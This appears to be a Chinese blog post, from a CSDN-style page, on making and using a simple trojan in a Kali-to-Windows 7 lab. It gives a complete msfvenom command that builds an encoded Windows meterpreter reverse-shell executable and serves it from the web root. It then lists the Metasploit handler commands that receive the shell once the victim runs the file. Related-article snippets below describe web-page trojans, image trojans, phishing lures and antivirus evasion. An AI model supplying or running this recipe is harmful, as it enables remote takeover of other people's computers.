简单的木马制作并且运用

最新推荐文章于 2024-06-16 11:52:13 发布
最新推荐文章于 2024-06-16 11:52:13 发布
阅读量4.9k 收藏 21
点赞数 2
文章标签: 安全 网络 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46317658/article/details/122480748
版权

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序并在目标主机上执行在本地监听上线。

实验环境:kali和windows7
在这里插入图片描述

  在kali终端中进行:

一: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/a.exe

-a : 指定系统架构
--platform : 指定平台
-p : 指定攻击载荷
lhost :监听地址
lport: 监听端口
-b: 去掉坏字符
-e: 指定编码器
-i: 指定编码次数
-f:指定输出文件格式
-o: 指定输出路径

二:进入监听模块
msfdb run进入msfvenom框架
use exploit/multi/handler 使用handler模块
show options 查看配置参数
设置payload:set payload windows/meterpreter/reverse_tcp
设置lhost:监听地址(必须和木马上的监听地址一致)set lhost ip
设置lport:监听端口 (必须和木马上的监听端口一致)set lport 4444
启动监听:run
启动apache2
在这里插入图片描述

三:在Windows7上进行下载a.exe并运行a.exe
在这里插入图片描述
在这里插入图片描述

目标主机成功上线成功获得shell
在这里插入图片描述

Matthew..
关注
  • 2
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
教你如何制作网页木马
箫箫博客
05-15 2966
大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。 1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容
kali学习4——使用msfvenom制作exe木马
不会心跳的博客
01-29 5595
使用msfvenom制作exe木马文件 1. msfvenom msfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木马的思路是,木马在目标机上执行后,向本机发送信息,而本机则需要开启监听状态,收到信息后则进行连接。 2. 制作木马 msfvenom制作木马需要的参数很多: root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement
手动编写木马
The code way of kinnisoy
04-29 3万+
使用C++实现一个简单木马,实现木马的远程控制功能,能够开机自启动和伪装或隐藏,最后通过清除本木马,掌握常规的木马排查和查杀方法。 工具:vc++6.0 攻击机:win10(ip随机) 靶机:192.168.1.129 一、木马是什么? 这是一个老生常谈的问题,木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马...
红队 | 社会工程学 | 邮件钓鱼 、木马伪装
最新发布
哦 卷!
06-16 782
社会工程学是一种特殊的攻击方式,与其他利用系统漏洞等网络攻击和入侵不同,社会工程学充分利用了人性中的“弱点”,包括本能反应、好奇心、信任、贪婪等,通过伪装、欺骗、恐吓、威逼等种种方式以达到目的。信息系统的管理者和使用者都是人,无论信息系统部署了多少安全产品,采取了多少有效的安全技术,如果系统的管理者或者使用者被利用,这些防护技术和措施都将成为摆设。人的因素才是系统的软肋,可以毫不夸张地说,人是信息系统安全防护体系中最不稳定也是最脆弱的环节。
MSF生成木马木马简单使用
爱喝水的仙人树的博客
11-03 8816
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
图片木马制作的三种方法
whatday的专栏
01-25 6万+
1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 2.Uedit32 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留
msfconsole之制作windows木马并成功获取shell
qq_56228347的博客
11-22 3557
msfconsole制作windows木马并上线获取控制权限
制作木马U盘工具盘教程
03-07
制作木马U盘工具盘是一项重要的网络安全措施,尤其在当今数字时代,U盘作为便携式存储设备,被广泛用于数据传输。然而,U盘也是木马病毒传播的常见途径之一。本教程将深入讲解如何创建一个安全的、防止木马感染的...
木马与病毒
03-26
病毒则是指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。 木马和病毒的主要区别在于自传播性,病毒具有自我复制的能力,而木马则不具备...
C# 木马功能的简单实现
12-04
1、首先解决开机启动木马。通过建立开机启动服务达到目的; 2、伪装问题。通过c#反射性能,将正常的.net的exe文件添加监控盗传播取等其他功能,执行正常程序同时,后台悄悄释放windows服务,通过服务释放调取木马exe...
主页木马制作方法
04-27
标题与描述中提到的“主页木马制作方法”涉及的是网络安全隐患领域中的恶意软件开发技术,这在合法的IT安全研究或防御措施制定中具有一定的参考价值,但绝不鼓励非法活动。以下是对这一概念的深入解析: ### 主页...
简单的查找网页木马工具
10-08
直接查找程序目录下网页木马简单易懂,红色标注为可疑
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 385
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
android木马制作方法,实现木马病毒的详细步骤
weixin_28292761的博客
05-27 1万+
前言:有没有遇到过这种情况,打开邮件,发现一封非常正常的邮件,附带了连接,你不以为然的点进去,结果中木马病毒了,这个套路是不是很熟悉,也很老套,但稍不注意就容易中木马病毒,希拉里邮件门事件不就是这样么?!作为一名程序员,你是否想过怎样实现这样一个木马病毒呢?来吧,这个项目就带你学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理,带你一步步了解如何制作一...
如何编写木马病毒
热门推荐
特权份子的专栏
09-30 9万+
如何编写木马病毒 www.hxhack.com 阅读:1434 时间:2007-7-23 9:46:39 整理:华夏黑盟 ------------------------------------------------------------------
一个简单木马程序的实现
BlackNight168的博客
09-20 1万+
参考链接:一个简单木马程序的实现 详细说明: 该代码生成的 exe 文件,点击之后,生成木马被控端,在主控端执行 cmd 命令:telnet 192.168.1.100 999 1、点击 enter 键,即可获得对方 命令终端 2、在命令终端执行 exit 可关闭被控端连接 ...
制作一个小木马的步骤
01-25 773
制作一个小木马的步骤2007-12-15 22:13特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。   我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉
msfvenom 怎么制作免杀木马
03-22
对于制作免杀木马的问题,我建议您不要进行此类活动,因为这是非法的并且可能会对您和他人造成严重的安全威胁。作为一个 AI,我不能支持或鼓励任何非法活动。如果您有任何其他编程方面的问题,我很乐意为您提供帮助...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值